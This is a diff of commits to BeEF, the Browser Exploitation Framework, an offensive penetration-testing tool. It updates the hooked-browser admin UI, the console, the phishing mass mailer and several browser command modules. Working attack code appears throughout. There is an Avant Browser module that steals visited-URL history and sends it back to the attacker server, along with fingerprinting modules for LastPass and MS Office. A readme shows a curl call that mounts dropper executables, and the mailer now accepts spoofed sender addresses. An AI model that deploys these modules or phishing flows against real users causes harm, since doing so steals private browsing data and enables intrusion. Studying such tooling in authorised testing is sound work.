html: "<div style='font:11px tahoma,arial,helvetica,sans-serif;width:500px' ><p style='font:11px tahoma,arial,helvetica,sans-serif'>The Tunneling Proxy allows you to use a hooked browser as a proxy. Simply right-click a browser from the Hooked Browsers tree to the left and select \"Use as Proxy\".</p><p style='margin: 10 0 10 0'><img src='<%= @base_path %>/media/images/help/proxy.png'></p><p>The proxy runs on localhost port 6789 by default. Each request sent through the Proxy is recorded in the History panel in the Rider tab. Click a history item to view the HTTP headers and HTML source of the HTTP response.</p><p style='margin: 10 0 10 0'><img src='<%= @base_path %>/media/images/help/history.png'></p><p style='font:11px tahoma,arial,helvetica,sans-serif'>To manually forge an arbitrary HTTP request use the \"Forge Request\" tab from the Rider tab.</p><p style='margin: 10 0 10 0'><img src='<%= @base_path %>/media/images/help/forge.png'></p><p style='font:11px tahoma,arial,helvetica,sans-serif'>For more information see: <a href=\"https://github.com/beefproject/beef/wiki/Tunneling\">https://github.com/beefproject/beef/wiki/Tunneling</a></p></div>",
listeners: {
activate: function(proxy_panel) {
// to do: refresh list of hooked browsers
@@ -56,7 +56,7 @@ ZombieTab_Requester = function(zombie) {
********************************************/
var history_panel_store = new Ext.ux.data.PagingJsonStore({
storeId: 'requester-history-store-zombie-'+zombie.session,
url: '/ui/requester/history.json',
url: '<%= @base_path %>/requester/history.json',
remoteSort: false,
autoDestroy: true,
autoLoad: false,
@@ -169,7 +169,7 @@ ZombieTab_Requester = function(zombie) {
listeners: {
activate: function(history_panel) {
history_panel.items.items[0].store.reload({params:{url:'/ui/requester/history.json'}});
history_panel.items.items[0].store.reload({params:{url:'<%= @base_path %>/requester/history.json'}});
}
}
});
@@ -190,7 +190,7 @@ ZombieTab_Requester = function(zombie) {
var form = new Ext.FormPanel({
title: 'Forge Raw HTTP Request',
id: 'requester-request-form-zombie'+zombie.session,
url: '/ui/requester/send',
url: '<%= @base_path %>/requester/send',
hideLabels : true,
border: false,
padding: '3px 5px 0 5px',
@@ -251,7 +251,7 @@ ZombieTab_Requester = function(zombie) {
bar.update_sending('Getting response...');
Ext.Ajax.request({
url: '/ui/requester/response.json',
url: '<%= @base_path %>/requester/response.json',
loadMask: true,
params: {

4
extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabXssRays.js
View File

@@ -23,7 +23,7 @@ ZombieTab_XssRaysTab = function(zombie) {
var xssrays_logs_store = new Ext.ux.data.PagingJsonStore({
storeId: 'xssrays-logs-store-zombie-' + zombie.session,
url: '/ui/xssrays/zombie.json',
url: '/<%= @base_path %>/xssrays/zombie.json',
remoteSort: false,
autoDestroy: true,
autoLoad: false,
@@ -94,7 +94,7 @@ ZombieTab_XssRaysTab = function(zombie) {
var form = new Ext.FormPanel({
title: 'Scan settings',
id: 'xssrays-config-form-zombie'+zombie.session,
url: '/ui/xssrays/createNewScan',
url: '<%= @base_path %>/xssrays/createNewScan',
labelWidth: 230,
border: false,
padding: '3px 5px 0 5px',

4
extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js
View File

@@ -85,14 +85,14 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, {
switch (item.id) {
case 'use_as_proxy':
Ext.Ajax.request({
url: '/ui/proxy/setTargetZombie',
url: '<%= @base_path %>/proxy/setTargetZombie',
method: 'POST',
params: 'hb_id=' + escape(hb_id)
});
break;
case 'xssrays_hooked_domain':
Ext.Ajax.request({
url: '/ui/xssrays/set_scan_target',
url: '<%= @base_path %>/xssrays/set_scan_target',
method: 'POST',
params: 'hb_id=' + escape(hb_id)
});

3
extensions/admin_ui/media/javascript/wterm/wterm.jquery.js
View File

@@ -422,3 +422,6 @@
};
})( jQuery );
var $jwterm = jQuery.noConflict();

39
extensions/console/lib/command_dispatcher/command.rb
View File

@@ -10,9 +10,18 @@ module CommandDispatcher
class Command
include BeEF::Extension::Console::CommandDispatcher
@@params = []
def initialize(driver)
super
begin
driver.interface.cmd['Data'].each{|data|
@@params << data['name']
}
rescue
return
end
end
def commands
@@ -41,12 +50,16 @@ class Command
}
print_line("Module name: " + driver.interface.cmd['Name'])
print_line("Module category: " + driver.interface.cmd['Category'])
print_line("Module category: " + driver.interface.cmd['Category'].to_s)
print_line("Module description: " + driver.interface.cmd['Description'])
print_line("Module parameters:") if not driver.interface.cmd['Data'].length == 0
driver.interface.cmd['Data'].each{|data|
print_line(data['name'] + " => \"" + data['value'].to_s + "\" # " + data['ui_label'])
if data['type'].eql?("combobox")
print_line(data['name'] + " => \"" + data['value'].to_s + "\" # " + data['ui_label'] + " (Options include: " + data['store_data'].to_s + ")")
else
print_line(data['name'] + " => \"" + data['value'].to_s + "\" # " + data['ui_label'])
end
} if not driver.interface.cmd['Data'].nil?
end
@@ -80,6 +93,16 @@ class Command
print_status("Sets parameters for the current modules. Run \"cmdinfo\" to see the parameter values")
print_status(" Usage: param <paramname> <paramvalue>")
end
def cmd_param_tabs(str,words)
return if words.length > 1
if @@params == ""
#nothing prepopulated?
else
return @@params
end
end
def cmd_execute(*args)
@@bare_opts.parse(args) {|opt, idx, val|
@@ -119,6 +142,7 @@ class Command
])
if args[0] == nil
lastcmdid = nil
driver.interface.getcommandresponses.each do |resp|
indiresp = driver.interface.getindividualresponse(resp['object_id'])
respout = ""
@@ -126,6 +150,7 @@ class Command
respout = "No response yet"
else
respout = Time.at(indiresp[0]['date'].to_i).to_s
lastcmdid = resp['object_id']
end
tbl << [resp['object_id'].to_s, resp['creationdate'], respout]
end
@@ -133,6 +158,16 @@ class Command
puts "\n"
puts "List of responses for this command module:\n"
puts tbl.to_s + "\n"
if not lastcmdid.nil?
resp = driver.interface.getindividualresponse(lastcmdid)
puts "\n"
print_line("The last response [" + lastcmdid.to_s + "] was retrieved: " + Time.at(resp[0]['date'].to_i).to_s)
print_line("Response:")
resp.each do |op|
print_line(op['data']['data'].to_s)
end
end
else
output = driver.interface.getindividualresponse(args[0])
if output.nil?

35
extensions/console/lib/command_dispatcher/core.rb
View File

@@ -141,13 +141,14 @@ class Core
[
'Id',
'IP',
'Hook Host',
'Browser',
'OS',
'Hardware'
])
BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 30)).each do |zombie|
tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName')+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'Hardware')]
tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session,"HostName").to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName').to_s+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion').to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'Hardware')]
end
puts "\n"
@@ -174,12 +175,14 @@ class Core
[
'Id',
'IP',
'Hook Host',
'Browser',
'OS'
'OS',
'Hardware'
])
BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 30)).each do |zombie|
tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName')+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName')]
tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session,"HostName").to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName').to_s+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion').to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'Hardware')]
end
puts "\n"
@@ -283,12 +286,21 @@ class Core
offlinezombies << zombie.id
end
if not offlinezombies.include?(args[0].to_i)
print_status("Browser does not appear to be offline..")
return false
end
targets = args[0].split(',')
targets.each {|t|
if not offlinezombies.include?(t.to_i)
print_status("Browser [id:"+t.to_s+"] does not appear to be offline.")
return false
end
#print_status("Adding browser [id:"+t.to_s+"] to target list.")
}
# if not offlinezombies.include?(args[0].to_i)
# print_status("Browser does not appear to be offline..")
# return false
# end
if not driver.interface.setofflinetarget(args[0]).nil?
if not driver.interface.setofflinetarget(targets).nil?
if (driver.dispatcher_stack.size > 1 and
driver.current_dispatcher.name != 'Core')
driver.destack_dispatcher
@@ -299,7 +311,7 @@ class Core
if driver.interface.targetid.length > 1
driver.update_prompt("(%bld%redMultiple%clr) ["+driver.interface.targetid.join(",")+"] ")
else
driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.to_s+"] ")
driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.first.to_s+"] ")
end
end
@@ -327,7 +339,12 @@ class Core
driver.run_single("offline")
when 'commands'
if driver.dispatched_enstacked(Target)
if args[1] == "-s" and not args[2].nil?
driver.run_single("commands #{args[1]} #{args[2]}")
return
else
driver.run_single("commands")
end
else
print_error("You aren't targeting a zombie yet")
end

46
extensions/console/lib/command_dispatcher/target.rb
View File

@@ -18,7 +18,7 @@ class Target
begin
driver.interface.getcommands.each { |folder|
folder['children'].each { |command|
@@commands << folder['text'] + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
@@commands << folder['text'].gsub(/\s/,"_") + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
}
}
rescue
@@ -40,17 +40,29 @@ class Target
@@bare_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help." ])
@@commands_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help."],
"-s" => [ false, "<search term>"],
"-r" => [ false, "List modules which have responses against them only"])
def cmd_commands(*args)
searchstring = nil
responly = nil
@@bare_opts.parse(args) {|opt, idx, val|
@@commands_opts.parse(args) {|opt, idx, val|
case opt
when "-h"
cmd_commands_help
return false
when "-s"
searchstring = args[1].downcase if not args[1].nil?
when "-r"
responly = true
end
}
tbl = Rex::Ui::Text::Table.new(
'Columns' =>
[
@@ -63,10 +75,29 @@ class Target
driver.interface.getcommands.each { |folder|
folder['children'].each { |command|
tbl << [command['id'].to_i,
folder['text'] + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_"),
cmdstring = folder['text'].gsub(/\s/,"_") + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
if not searchstring.nil?
if not cmdstring.downcase.index(searchstring).nil?
tbl << [command['id'].to_i,
cmdstring,
command['status'].gsub(/^Verified /,""),
driver.interface.getcommandresponses(command['id']).length] #TODO
end
elsif not responly.nil?
tbl << [command['id'].to_i,
cmdstring,
command['status'].gsub(/^Verified /,""),
driver.interface.getcommandresponses(command['id']).length] if driver.interface.getcommandresponses(command['id']).length.to_i > 0
else
tbl << [command['id'].to_i,
cmdstring,
command['status'].gsub(/^Verified /,""),
driver.interface.getcommandresponses(command['id']).length] #TODO
end
}
}
@@ -78,6 +109,9 @@ class Target
def cmd_commands_help(*args)
print_status("List command modules for this target")
print_line("Usage: commands [options]")
print_line
print @@commands_opts.usage()
end
def cmd_info(*args)
@@ -133,7 +167,7 @@ class Target
else
driver.interface.getcommands.each { |x|
x['children'].each { |y|
if args[0].chomp == x['text']+"/"+y['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
if args[0].chomp == x['text'].gsub(/\s/,"_")+y['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
modid = y['id']
end
}

11
extensions/console/lib/shellinterface.rb
View File

@@ -302,6 +302,7 @@ class ShellInterface
['Browser Components', 'Windows Media Player','HasWMP'],
['Browser Components', 'VLC', 'HasVLC'],
['Browser Components', 'Foxit', 'HasFoxit'],
['Browser Components', 'WebRTC', 'HasWebRTC'],
['Browser Components', 'ActiveX', 'HasActiveX'],
['Browser Components', 'Session Cookies', 'hasSessionCookies'],
['Browser Components', 'Persistent Cookies', 'hasPersistentCookies'],
@@ -310,7 +311,7 @@ class ShellInterface
['Hooked Page', 'Page Title', 'PageTitle'],
['Hooked Page', 'Page URI', 'PageURI'],
['Hooked Page', 'Page Referrer', 'PageReferrer'],
['Hooked Page', 'Host Name/IP', 'HostName'],
['Hooked Page', 'Hook Host', 'HostName'],
['Hooked Page', 'Cookies', 'Cookies'],
# Host
@@ -328,22 +329,22 @@ class ShellInterface
case p[2]
when "BrowserName"
data = BeEF::Core::Constants::Browsers.friendly_name(BD.get(zombie_session, p[2]))
data = BeEF::Core::Constants::Browsers.friendly_name(BD.get(self.targetsession.to_s, p[2])).to_s
when "ScreenSize"
screen_size_hash = JSON.parse(BD.get(zombie_session, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
screen_size_hash = JSON.parse(BD.get(self.targetsession.to_s, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
width = screen_size_hash['width']
height = screen_size_hash['height']
cdepth = screen_size_hash['colordepth']
data = "Width: #{width}, Height: #{height}, Colour Depth: #{cdepth}"
when "WindowSize"
window_size_hash = JSON.parse(BD.get(zombie_session, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
window_size_hash = JSON.parse(BD.get(self.targetsession.to_s, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
width = window_size_hash['width']
height = window_size_hash['height']
data = "Width: #{width}, Height: #{height}"
else
data = BD.get(zombie_session, p[2])
data = BD.get(self.targetsession, p[2])
end
# add property to summary hash

6
extensions/demos/html/basic.html
View File

@@ -1,10 +1,10 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<!--
Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>BeEF Basic Demo</title>
<script>
@@ -19,7 +19,6 @@
Have fun while your browser is working against you.
</p>
<p>
These links are for demonstrating the "Get Page HREFs" command module<br />
<ul>
@@ -28,7 +27,6 @@
<li><a href="http://slashdot.org/" target="_blank">Slashdot</a>
</ul>
</p>
<p>Have a go at the event logger.<br />
<label for="imptxt">Insert your secret here:</label>&nbsp;&nbsp;<input type="text" id="imptxt" name="Important Text" /></p>

4
extensions/evasion/obfuscation/minify.rb
View File

@@ -6,7 +6,7 @@
module BeEF
module Extension
module Evasion
require 'jsmin'
require 'uglifier'
class Minify
include Singleton
@@ -15,7 +15,7 @@ module BeEF
end
def execute(input, config)
input = JSMin.minify(input)
input = Uglifier.compile(input)
print_debug "[OBFUSCATION - MINIFIER] Javascript has been minified"
input
end

3
extensions/metasploit/config.yaml
View File

@@ -33,6 +33,9 @@ beef:
{os: 'bt5r3', path: '/opt/metasploit/msf3/'},
{os: 'bt5', path: '/opt/framework3/msf3/'},
{os: 'backbox', path: '/opt/metasploit3/msf3/'},
{os: 'kali', path: '/usr/share/metasploit-framework/'},
#{os: 'pentoo', path: '/usr/lib64/metasploit9999/'},
{os: 'pentoo', path: '/usr/lib/metasploit'},
{os: 'win', path: 'c:\\metasploit-framework\\'},
{os: 'custom', path: ''}
]

2
extensions/social_engineering/config.yaml
View File

@@ -21,7 +21,7 @@ beef:
use_auth: true
use_tls: true
helo: "gmail.com" # this is usually the domain name
from: "youruser@gmail.com"
auth: "youruser@gmail.com"
password: "yourpass"
# available templates
templates:

9
extensions/social_engineering/droppers/readme.txt Normal file
View File

@@ -0,0 +1,9 @@
This directory will contain the droppers (executables, JARs, browser extensions, etc..)
that you want to have available on the BeEF server.
For example, if you want to have bin.exe available at http://beefserver/bin.exe,
use the following RESTful API call:
curl -H "Content-Type: application/json; charset=UTF-8" -d
'{"mount":"/bin.exe", "local_file":"/extensions/social_engineering/droppers/bin.exe"}'
-X POST http://beefserver/api/server/bind?token=<token>

68
extensions/social_engineering/mass_mailer/mass_mailer.rb
View File

@@ -20,14 +20,14 @@ module BeEF
@host = @config.get("#{@config_prefix}.host")
@port = @config.get("#{@config_prefix}.port")
@helo = @config.get("#{@config_prefix}.helo")
@from = @config.get("#{@config_prefix}.from")
@auth = @config.get("#{@config_prefix}.auth")
@password = @config.get("#{@config_prefix}.password")
end
# tos_hash is an Hash like:
# 'antisnatchor@gmail.com' => 'Michele'
# 'ciccio@pasticcio.com' => 'Ciccio'
def send_email(template, fromname, subject, link, linktext, tos_hash)
def send_email(template, fromname, fromaddr, subject, link, linktext, tos_hash)
# create new SSL context and disable CA chain validation
if @config.get("#{@config_prefix}.use_tls")
@ctx = OpenSSL::SSL::SSLContext.new
@@ -37,7 +37,7 @@ module BeEF
n = tos_hash.size
x = 1
print_info "Sending #{n} mail(s) from [#{@from}] - name [#{fromname}] using template [#{template}]:"
print_info "Sending #{n} mail(s) from [#{fromaddr}] - name [#{fromname}] using template [#{template}]:"
print_info "subject: #{subject}"
print_info "link: #{link}"
print_info "linktext: #{linktext}"
@@ -47,19 +47,19 @@ module BeEF
smtp.enable_starttls(@ctx) unless @config.get("#{@config_prefix}.use_tls") == false
if @config.get("#{@config_prefix}.use_auth")
smtp.start(@helo, @from, @password, :login) do |smtp|
smtp.start(@helo, @auth, @password, :login) do |smtp|
tos_hash.each do |to, name|
message = compose_email(fromname, to, name, subject, link, linktext, template)
smtp.send_message(message, @from, to)
message = compose_email(fromname, fromaddr, to, name, subject, link, linktext, template)
smtp.send_message(message, fromaddr, to)
print_info "Mail #{x}/#{n} to [#{to}] sent."
x += 1
end
end
else
smtp.start(@helo, @from) do |smtp|
smtp.start(@helo) do |smtp|
tos_hash.each do |to, name|
message = compose_email(fromname, to, name, subject, link, linktext, template)
smtp.send_message(message, @from, to)
message = compose_email(fromname, fromaddr, to, name, subject, link, linktext, template)
smtp.send_message(message, fromaddr, to)
print_info "Mail #{x}/#{n} to [#{to}] sent."
x += 1
end
@@ -67,33 +67,39 @@ module BeEF
end
end
def compose_email(fromname, to, name, subject, link, linktext, template)
msg_id = random_string(50)
boundary = "------------#{random_string(24)}"
rel_boundary = "------------#{random_string(24)}"
def compose_email(fromname, fromaddr, to, name, subject, link, linktext, template)
begin
msg_id = random_string(50)
boundary = "------------#{random_string(24)}"
rel_boundary = "------------#{random_string(24)}"
header = email_headers(@from, fromname, @user_agent, to, subject, msg_id, boundary)
plain_body = email_plain_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.plain", template), boundary)
rel_header = email_related(rel_boundary)
html_body = email_html_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.html", template),rel_boundary)
images = ""
@config.get("#{@config_prefix}.templates.#{template}.images").each do |image|
images += email_add_image(image, "#{@templates_dir}#{template}/#{image}",rel_boundary)
end
header = email_headers(fromaddr, fromname, @user_agent, to, subject, msg_id, boundary)
plain_body = email_plain_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.plain", template), boundary)
rel_header = email_related(rel_boundary)
html_body = email_html_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.html", template),rel_boundary)
attachments = ""
if @config.get("#{@config_prefix}.templates.#{template}.attachments") != nil
@config.get("#{@config_prefix}.templates.#{template}.attachments").each do |attachment|
attachments += email_add_attachment(attachment, "#{@templates_dir}#{template}/#{attachment}",rel_boundary)
end
end
images = ""
@config.get("#{@config_prefix}.templates.#{template}.images").each do |image|
images += email_add_image(image, "#{@templates_dir}#{template}/#{image}",rel_boundary)
end
close = email_close(boundary)
attachments = ""
if @config.get("#{@config_prefix}.templates.#{template}.attachments") != nil
@config.get("#{@config_prefix}.templates.#{template}.attachments").each do |attachment|
attachments += email_add_attachment(attachment, "#{@templates_dir}#{template}/#{attachment}",rel_boundary)
end
end
message = header + plain_body + rel_header + html_body + images + attachments + close
print_debug "Raw Email content:\n #{message}"
message
close = email_close(boundary)
rescue Exception => e
print_error "Error constructing email."
raise
end
message = header + plain_body + rel_header + html_body + images + attachments + close
print_debug "Raw Email content:\n #{message}"
message
end
def email_headers(from, fromname, user_agent, to, subject, msg_id, boundary)

17
extensions/social_engineering/rest/socialengineering.rb
View File

@@ -70,6 +70,7 @@ module BeEF
# "template": "default",
# "subject": "Hi from BeEF",
# "fromname": "BeEF",
# "fromaddr": "beef@beef.com",
# "link": "http://www.microsoft.com/security/online-privacy/phishing-symptoms.aspx",
# "linktext": "http://beefproject.com",
# "recipients": [{
@@ -85,10 +86,11 @@ module BeEF
template = body["template"]
subject = body["subject"]
fromname = body["fromname"]
fromaddr = body["fromaddr"]
link = body["link"]
linktext = body["linktext"]
if template.nil? || subject.nil? || fromname.nil? || link.nil? || linktext.nil?
if template.nil? || subject.nil? || fromaddr.nil? || fromname.nil? || link.nil? || linktext.nil?
print_error "All parameters are mandatory."
halt 401
end
@@ -106,11 +108,16 @@ module BeEF
halt 401
end
end
mass_mailer = BeEF::Extension::SocialEngineering::MassMailer.instance
mass_mailer.send_email(template, fromname, subject, link, linktext, recipients)
rescue Exception => e
print_error "Invalid JSON input passed to endpoint /api/seng/clone_page"
print_error "Invalid JSON input passed to endpoint /api/seng/send_emails"
error 400
end
begin
mass_mailer = BeEF::Extension::SocialEngineering::MassMailer.instance
mass_mailer.send_email(template, fromname, fromaddr, subject, link, linktext, recipients)
rescue Exception => e
print_error "Invalid mailer configuration"
error 400
end
end

4
install-beef
View File

@@ -5,6 +5,8 @@
# See the file 'doc/COPYING' for copying permission
#
set -e
clear
echo "======================================"
echo " BeEF Installer "
@@ -76,7 +78,7 @@ if [ "$Distro" == "Debian" ]; then
sudo apt-get install build-essential openssl libreadline6 libreadline6-dev zlib1g zlib1g-dev libssl-dev libyaml-dev libsqlite3-0 libsqlite3-dev sqlite3 libxml2-dev libxslt1-dev autoconf libc6-dev libncurses5-dev automake libtool bison subversion
bash < <(curl -sk https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer)
curl -sk https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer | bash
echo '[[ -s "$HOME/.rvm/scripts/rvm" ]] && . "$HOME/.rvm/scripts/rvm"' >> ~/.bashrc

2
liveCD/BeEFLive.sh
View File

@@ -189,6 +189,8 @@ show_menu() {
git stash
git pull
msf="0"
# check for new bundle requirements and update
bundle update
fi
#

38
modules/browser/avant_steal_history/command.js
View File

@@ -15,37 +15,33 @@
//
beef.execute(function() {
if (!beef.browser.isA()) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Exploit failed. Target browser is not Avant Browser.");
return;
}
var avant_iframe = document.createElement("iframe");
//var avant_iframe = beef.dom.createInvisibleIframe();
avant_iframe.setAttribute('src', "browser:home");
avant_iframe.setAttribute('name','test2');
avant_iframe.setAttribute('width','0');
avant_iframe.setAttribute('heigth','0');
avant_iframe.setAttribute('src', 'browser:home');
avant_iframe.setAttribute('name', 'avant_history_<%= @command_id %>');
avant_iframe.setAttribute('width', '0');
avant_iframe.setAttribute('heigth', '0');
avant_iframe.setAttribute('scrolling','no');
avant_iframe.setAttribute('style', 'display:none');
document.body.appendChild(avant_iframe);
var vstr = {value: ""};
if(window['test2'].navigator) {
//This works if FF is the rendering engine
window['test2'].navigator.AFRunCommand(<%= @cId %>, vstr);
beef.net.send("<%= @command_url %>", <%= @command_id %>, vstr.value);
if (window['avant_history_<%= @command_id %>'].navigator) {
//This works if FF is the rendering engine
window['avant_history_<%= @command_id %>'].navigator.AFRunCommand(<%= @cId %>, vstr);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+vstr.value);
} else {
// this works if Chrome is the rendering engine
//window['avant_history_<%= @command_id %>'].AFRunCommand(60003, vstr);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Exploit failed. Rendering engine is not set to Firefox.");
}
else {
// this works if Chrome is the rendering engine
//window['test2'].AFRunCommand(60003, vstr);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "Exploit failed. Rendering engine is not set to Firefox");
}
});

4
modules/browser/avant_steal_history/config.yaml
View File

@@ -19,7 +19,7 @@ beef:
enable: true
category: "Browser"
name: "Get Visited URLs (Avant Browser)"
description: "Invoke AFRunCommand() privileged function. The integer 60003 is passed by default to dump the Avant Browser history."
description: "This module attempts to retrieve a user's browser history by invoking the 'AFRunCommand()' privileged function.<br/><br/>Note: Avant Browser in Firefox engine mode only."
authors: ["Roberto Suggi Liverani"]
target:
working: ["ALL"]
working: ["FF"]

4
modules/browser/browser_fingerprinting/command.js
View File

@@ -34,6 +34,10 @@ beef.execute(function() {
new Array("Firefox","4+","resource:///chrome/browser/skin/classic/browser/Geolocation-16.png"),
new Array("Firefox","7+","resource:///chrome/browser/content/browser/aboutHome-snippet1.png"),
new Array("Firefox","8+","resource:///chrome/browser/skin/classic/aero/browser/Toolbar-inverted.png"),
new Array("Firefox","9+","resource:///chrome/browser/skin/classic/aero/browser/identity.png"),
new Array("Firefox","10+","chrome://browser/skin/sync-128.png"),
new Array("Firefox","13+","chrome://browser/content/abouthome/noise.png"),
new Array("Firefox","18+","resource:///chrome/browser/skin/classic/aero/browser/webRTC-shareDevice-16.png"),
new Array("Internet Explorer","5-6","res://shdoclc.dll/pagerror.gif"),
new Array("Internet Explorer","7-9","res://ieframe.dll/ielogo.png"),
new Array("Internet Explorer","7+","res://ieframe.dll/info_48.png")

29
modules/browser/detect_lastpass/command.js Normal file
View File

@@ -0,0 +1,29 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var result = "Not in use or not installed";
var lpdiv = document.getElementById('hiddenlpsubmitdiv');
if (typeof(lpdiv) != 'undefined' && lpdiv != null) {
//We've got the first detection of LP
result = "Detected LastPass through presence of the <script> tag with id=hiddenlpsubmitdiv";
} else if ($j("script:contains(lastpass_iter)").length > 0) {
//We've got the second detection of LP
result = "Detected LastPass through presense of the embedded <script> which includes references to lastpass_iter";
} else {
//Form is not there, lets check for any form elements in this page, because, LP won't activate at all without a <form>
if (document.getElementsByTagName("form").length == 0) {
//No forms
result = "The page doesn't seem to include any forms - we can't tell if LastPass is installed";
}
}
beef.net.send("<%= @command_url %>", <%= @command_id %>, "lastpass="+result);
});

16
modules/browser/detect_lastpass/config.yaml Normal file
View File

@@ -0,0 +1,16 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_lastpass:
enable: true
category: "Browser"
name: "Detect LastPass"
description: "This module checks if the LastPass extension is installed and active."
authors: ["xntrik"]
target:
not_working: ["IE"]
working: ["All"]

14
modules/browser/detect_lastpass/module.rb Normal file
View File

@@ -0,0 +1,14 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_lastpass < BeEF::Core::Command
def post_execute
content = {}
content['lastpass'] = @datastore['lastpass'] if not @datastore['lastpass'].nil?
save content
end
end

44
modules/browser/detect_office/command.js Normal file
View File

@@ -0,0 +1,44 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var ma = 1;
var mb = 1;
var mc = 1;
var md = 1;
try {
ma = new ActiveXObject("SharePoint.OpenDocuments.4")
} catch (e) {}
try {
mb = new ActiveXObject("SharePoint.OpenDocuments.3")
} catch (e) {}
try {
mc = new ActiveXObject("SharePoint.OpenDocuments.2")
} catch (e) {}
try {
md = new ActiveXObject("SharePoint.OpenDocuments.1")
} catch (e) {}
var a = typeof ma;
var b = typeof mb;
var c = typeof mc;
var d = typeof md;
var key = "No Office Found";
if (a == "object" && b == "object" && c == "object" && d == "object") {
key = "Office 2010"
}
if (a == "number" && b == "object" && c == "object" && d == "object") {
key = "Office 2007"
}
if (a == "number" && b == "number" && c == "object" && d == "object") {
key = "Office 2003"
}
if (a == "number" && b == "number" && c == "number" && d == "object") {
key = "Office Xp"
}
beef.net.send("<%= @command_url %>", <%= @command_id %>, "office="+key);
});

16
modules/browser/detect_office/config.yaml Normal file
View File

@@ -0,0 +1,16 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_office:
enable: true
category: "Browser"
name: "Detect MS Office"
description: "This module detect the version of MS Office if installed"
authors: ["nbblrr"]
target:
working: ["IE"]
not_working: ["All"]

14
modules/browser/detect_office/module.rb Normal file
View File

@@ -0,0 +1,14 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_office < BeEF::Core::Command
def post_execute
content = {}
content['office'] = @datastore['office']
save content
end
end

60
modules/browser/detect_unity/command.js Normal file
View File

@@ -0,0 +1,60 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var hasUnity = function() {
// Internet Explorer
if ( beef.browser.isIE() ) {
try {
var unity_test = new ActiveXObject('UnityWebPlayer.UnityWebPlayer.1');
} catch (e) { }
if ( unity_test ) {
return true;
}
// Not Internet Explorer
